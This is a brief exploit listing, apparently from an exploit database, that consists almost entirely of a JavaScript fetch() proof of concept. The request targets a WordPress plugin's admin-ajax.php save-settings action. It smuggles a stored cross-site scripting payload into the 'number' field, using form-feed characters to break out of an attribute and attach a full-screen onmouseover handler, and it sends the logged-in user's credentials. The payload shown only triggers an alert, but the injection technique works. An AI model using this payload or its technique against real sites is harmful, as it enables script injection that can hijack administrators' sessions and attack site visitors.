Share
## https://sploitus.com/exploit?id=WPEX-ID:CAAB1FCA-CC6B-45BB-BD0D-F857EDD8BB81
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },

  "method": "POST",
  "body": "action=okapi_wasb_save_settings&number=\" style=position:fixed;left:0;top:0;right:0;bottom:0;z-index:9999\x0conmouseover=alert`1`\x0cppp&display_on_desktop=1&activate=1",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));